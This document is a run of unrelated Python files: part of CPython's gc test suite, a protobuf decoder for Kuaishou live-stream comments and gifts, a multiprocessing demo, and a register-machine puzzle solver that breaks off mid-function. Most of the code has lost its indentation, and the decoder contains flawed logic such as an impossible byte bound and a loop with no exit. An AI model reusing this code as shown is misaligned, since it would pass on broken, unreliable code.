# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
@cpython_only
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
@requires_type_collecting
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
    """Run the gc test suite with automatic collection disabled and
    DEBUG_LEAK cleared, restoring the interpreter's gc state afterwards."""
    enabled = gc.isenabled()
    gc.disable()
    assert not gc.isenabled()
    debug = gc.get_debug()
    gc.set_debug(debug & ~gc.DEBUG_LEAK)  # this test is supposed to leak
    try:
        gc.collect()  # Delete 2nd generation garbage
        run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
    finally:
        gc.set_debug(debug)
        # test gc.enable() even if GC is disabled by default
        if verbose:
            print("restoring automatic collection")
        # make sure to always test gc.enable()
        gc.enable()
        assert gc.isenabled()
        if not enabled:
            gc.disable()

if __name__ == "__main__":
    test_main()
|
util.py |
import time
class MessageDecode:
def __init__(self, buf):
self.buf = buf
self.pos = 0
self.message = {}
def __len__(self):
return len(self.buf)
def int_(self):
res = 0
i = 0
while self.buf[self.pos] >= 128:
res = res | (127 & self.buf[self.pos]) << 7 * i
self.pos += 1
i += 1
res = res | self.buf[self.pos] << 7 * i
self.pos += 1
return res
@staticmethod
def hex_(n):
res = []
while n > 128:
res.append(int((n & 127) | 128))
n = n >> 7
res.append(int(n))
return res
def bytes(self):
e = self.int_()
if e + self.pos > len(self.buf):
raise Exception('长度不匹配')
res = self.buf[self.pos:e + self.pos]
self.pos += e
return res
def skip(self, e=None):
"""跳过多少字节"""
if e is None:
while self.pos < len(self.buf):
if 128 & self.buf[self.pos] == 0:
self.pos += 1
return
self.pos += 1
return
self.pos += e
if self.pos >= len(self.buf):
self.pos -= 1
def skipType(self, e):
if e == 0:
self.skip()
elif e == 1:
self.skip(8)
elif e == 2:
self.skip(self.int_())
elif e == 3:
while True:
e = 7 & self.int_()
if 4 != e:
self.skipType(e)
elif e == 5:
self.skip(4)
else:
raise Exception('跳过类型错误')
def decode(self):
"""只处理弹幕"""
length = len(self)
while self.pos < length:
t = self.int_()
tt = t >> 3
if tt == 1:
self.message['payloadType'] = self.int_()
if self.message['payloadType'] != 310: # 非弹幕
return False
elif tt == 2:
self.message['compressionType'] = self.int_()
elif tt == 3:
self.message['payload'] = self.bytes()
else:
self.skipType(t & 7)
return True
def string(self):
e = self.bytes()
n = len(e)
if n < 1:
return ""
s = []
t = 0
while t < n:
r = e[t]
t += 1
if r < 128:
s.append(r)
elif 191 < r < 224:
s.append((31 & r) << 6 | 63 & e[t])
t += 1
elif 239 < r < 365:
x = (7 & r) << 18 | (63 & e[t]) << 12
t += 1
y = (63 & e[t]) << 6
t += 1
z = 63 & e[t]
t += 1
r = (x | y | z) - 65536
s.append(55296 + (r >> 10))
s.append(56320 + (1023 & r))
else:
x = (15 & r) << 12
y = (63 & e[t]) << 6
t += 1
z = 63 & e[t]
t += 1
s.append(x | y | z)
string = ''
for w in s:
string += chr(w)
return string
def user_info_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['principalId'] = self.string()
elif tt == 2:
m['userName'] = self.string()
elif tt == 3:
m['headUrl'] = self.string()
else:
self.skipType(t & 7)
return m
def web_like_feed_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['sortRank'] = self.int_()
elif tt == 4:
m['deviceHash'] = self.string()
else:
self.skipType(t & 7)
return m
def comment_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['content'] = self.string()
elif tt == 4:
m['deviceHash'] = self.string()
elif tt == 5:
m['sortRank'] = self.int_()
elif tt == 6:
m['color'] = self.string()
elif tt ==7:
m['showType']=self.int_()
else:
self.skipType(t & 7)
return m
def gift_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['time'] = self.int_()
elif tt == 4:
m['giftId'] = self.int_()
elif tt == 5:
m['sortRank'] = self.int_()
elif tt == 6:
m['mergeKey'] = self.string()
elif tt == 7:
m['batchSize'] = self.int_()
elif tt == 8:
m['comboCount'] = self.int_()
elif tt == 9:
m['rank'] = self.int_()
elif tt == 10:
m['expireDuration'] = self.int_()
elif tt == 11:
m['clientTimestamp'] = self.int_()
elif tt == 12:
m['slotDisplayDuration'] = self.int_()
elif tt == 13:
m['starLevel'] = self.int_()
elif tt == 14:
m['styleType'] = self.int_()
elif tt == 15:
m['liveAssistantType'] = self.int_()
elif tt == 16:
m['deviceHash'] = self.string()
elif tt == 17:
m['danmakuDisplay'] = self.bool()
else:
self.skipType(t & 7)
return m
def feed_decode(self):
    """Decode the top-level feed payload in self.message['payload'].

    Mutates self.message in place:
      field 1 -> 'displayWatchingCount' (also printed to stdout)
      field 2 -> 'displayLikeCount'
      field 5 -> appended to self.message['user'] (decoded chat comments)
      field 9 -> appended to self.message['gift'] (decoded gifts)
      fields 6 and 8 are parsed and discarded.
    """
    self.pos = 0
    self.buf = self.message['payload']
    length = len(self.buf)
    while self.pos < length:
        t = self.int_()
        tt = t >> 3  # protobuf field number
        if tt == 1:
            self.message['displayWatchingCount'] = self.string()
            print("观看人数:" + self.message['displayWatchingCount'])
        elif tt == 2:
            self.message['displayLikeCount'] = self.string()
            # print("点赞数:" + self.message['displayLikeCount'])
        elif tt == 5:
            if not self.message.get('user'):
                self.message['user'] = []
            self.message['user'].append(self.comment_decode(self.buf, self.int_()))
        elif tt == 6:
            self.string()  # consumed but unused
        elif tt == 8:
            self.web_like_feed_decode(self.buf, self.int_())  # parsed but unused
        elif tt == 9:  # gift
            if not self.message.get('gift'):
                self.message['gift'] = []
            self.message['gift'].append(self.gift_decode(self.buf, self.int_()))
        else:
            # BUG FIX: every other decoder in this class skips unknown fields
            # with skipType(); without this branch an unrecognised field left
            # its value bytes unread and desynchronised the rest of the parse.
            self.skipType(t & 7)
# Script entry point intentionally does nothing: the interactive Tkinter
# front-end below is kept disabled (commented out).
if __name__ == '__main__':
    pass
# from tkinter import Tk, END, Label, Entry,W,E,Button,Text
# root = Tk()
# root.title('快手弹幕收集工具')
# root.geometry('660x450+500+200')
# lable = Label(root, text='请输入主播id:', font=('楷体', 20))
# lable3 = Label(root, text='请输入房间id:', font=('楷体', 20))
# lable2 = Label(root, text='请输入你的cookie:', font=('楷体', 20))
# lable.grid()
# lable2.grid()
# lable3.grid()
# entry = Entry(root, font=('楷体', 20))
# entry2 = Entry(root, font=('楷体', 20))
# entry3 = Entry(root, font=('楷体', 20))
# entry2.grid(row=1, column=1)
# entry3.grid(row=2, column=1)
# entry.grid(row=0, column=1)
#
# import threading
# def thread_it(func, *args):
# t = threading.Thread(target=func, args=args)
# t.setDaemon(True)
# t.start()
#
# def get_uid():
# return entry.get()
#
# def get_ck():
# return entry2.get()
#
# def get_stream_id():
# return entry3.get()
#
# def main():
# text1.insert(END,"正在启动任务\n")
# uid = get_uid()
# did = get_ck()
# stream_id = get_stream_id()
# spider = Spider(uid, Client, did, stream_id)
# spider.run()
#
#
# button1 = Button(root, text='开始任务', font=('楷体', 18), command=lambda: thread_it(main,))
# button2 = Button(root, text='退出程序', font=('楷体', 18), command=root.quit)
# button1.grid(row=3, column=0, sticky=W,padx=20, pady=20)
# button2.grid(row=3, column=1, sticky=E,padx=20, pady=20)
# text1 = Text(root, width=30, height=10)
# text1.grid()
# root.mainloop()
|
multipcheck.py | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 6 18:45:21 2019
@author: admin
"""
from multiprocessing import Lock, Process, Queue, current_process
import time
import queue # imported for using queue.Empty exception
def do_job(tasks_to_accomplish, tasks_that_are_done):
    """Worker loop: drain tasks from one queue, report completions on another.

    Pulls tasks non-blockingly until the input queue reports Empty, echoing
    each task and pushing a "<task> is done by <process name>" message onto
    the done queue. Returns True once the input queue is exhausted.
    """
    while True:
        try:
            # get_nowait() raises queue.Empty instead of blocking when
            # nothing is available.
            task = tasks_to_accomplish.get_nowait()
        except queue.Empty:
            return True
        print(task)
        tasks_that_are_done.put(task + ' is done by ' + current_process().name)
        time.sleep(.5)  # demo pacing so the workers interleave visibly
def main():
    """Spread 10 demo tasks across 4 worker processes and print the results."""
    task_count = 10
    worker_count = 4
    pending = Queue()
    completed = Queue()
    # enqueue the work before any worker starts
    for n in range(task_count):
        pending.put("Task no " + str(n))
    workers = [Process(target=do_job, args=(pending, completed))
               for _ in range(worker_count)]
    for proc in workers:
        proc.start()
    # wait for every worker to drain the queue and exit
    for proc in workers:
        proc.join()
    # print the completion messages the workers reported
    while not completed.empty():
        print(completed.get())
    return True
if __name__ == '__main__':
main() |
sound.py | from multiprocessing import Process, Queue, Value, Semaphore
def get_val(regs, val):
    """Resolve an operand: a register name yields its value, anything else
    is parsed as an integer literal."""
    return regs[val] if val.isalpha() else int(val)
def second(instructions, send, receive, counter, sem, default):
    """Run one program of the two-program (part two) variant.

    Executes `instructions` with every unseen register initialised to
    `default`. 'snd' pushes the value onto `send`, releases `sem` and
    increments `counter`; 'rcv' acquires `sem` and blocks on `receive`.
    Runs until the program counter leaves the instruction list.

    Parameters
    ----------
    instructions : list[str] -- assembly lines such as "set a 1"
    send, receive : queues for outgoing / incoming values
    counter : shared Value counting this program's sends
    sem : semaphore shared with the supervisor for deadlock detection
    default : int -- initial value for registers on first reference

    Returns None when execution falls off the instruction list.
    """
    regs = {}

    def value_of(token):
        # Operands are either a register name or an integer literal.
        return regs[token] if token.isalpha() else int(token)

    i = 0
    while 0 <= i < len(instructions):
        instr = instructions[i].split()
        cmd = instr[0]
        # Registers spring into existence on first mention.
        if instr[1] not in regs:
            regs[instr[1]] = default
        if len(instr) == 3 and instr[2] not in regs and instr[2].isalpha():
            regs[instr[2]] = default
        if cmd == 'snd':
            send.put(regs[instr[1]])
            sem.release()
            counter.value += 1
        elif cmd == 'set':
            regs[instr[1]] = value_of(instr[2])
        elif cmd == 'add':
            regs[instr[1]] += value_of(instr[2])
        elif cmd == 'mul':
            regs[instr[1]] *= value_of(instr[2])
        elif cmd == 'mod':
            regs[instr[1]] = regs[instr[1]] % value_of(instr[2])
        elif cmd == 'rcv':
            sem.acquire()
            regs[instr[1]] = receive.get()
        elif cmd == 'jgz':
            if value_of(instr[1]) > 0:
                i += value_of(instr[2])
                continue
        i += 1
    # BUG FIX: the original ended with `return sound`, but `sound` is never
    # defined in this function (copy/paste from part one) and raised
    # NameError on normal termination. The caller never uses the return
    # value, so return None explicitly.
    return None
def solve_second(instructions):
    """Run both programs (ids 0 and 1) until completion or deadlock and
    return how many values program 1 sent.

    Each 'snd' releases the shared semaphore and each 'rcv' acquires it,
    so when both programs sit blocked in 'rcv' the semaphore (initialised
    to 2) is exhausted; the non-blocking acquire below then fails and
    both workers are terminated.
    """
    p0in, p1in = Queue(), Queue()
    # p1val counts program 1's sends -- the puzzle answer
    p0val, p1val = Value('i', 0), Value('i', 0)
    sem = Semaphore(2)
    # each program sends on its own queue and receives from the other's;
    # the trailing arg seeds unseen registers with the program id
    p0 = Process(target=second, args=(instructions, p0in, p1in, p0val, sem, 0,))
    p1 = Process(target=second, args=(instructions, p1in, p0in, p1val, sem, 1,))
    p0.start()
    p1.start()
    # wait till we're either deadlocked or we're finished
    while(p0.is_alive() and p1.is_alive()):
        if sem.acquire(False): sem.release()
        else: break
    p0.terminate()
    p1.terminate()
    return p1val.value
def first(instructions):
    """Execute the register program (part one) and return the value of the
    last 'snd' at the moment the first 'rcv' with a non-zero register runs.

    Falls through and returns the last sound if the program counter ever
    leaves the instruction list.
    """
    registers = {}
    last_sound = 0
    pc = 0

    def operand(token):
        # A register name resolves to its value; anything else is a literal.
        return registers[token] if token.isalpha() else int(token)

    while 0 <= pc < len(instructions):
        parts = instructions[pc].split()
        op = parts[0]
        # Registers spring into existence (value 0) on first mention.
        registers.setdefault(parts[1], 0)
        if len(parts) == 3 and parts[2].isalpha():
            registers.setdefault(parts[2], 0)
        if op == 'snd':
            last_sound = registers[parts[1]]
        elif op == 'set':
            registers[parts[1]] = operand(parts[2])
        elif op == 'add':
            registers[parts[1]] += operand(parts[2])
        elif op == 'mul':
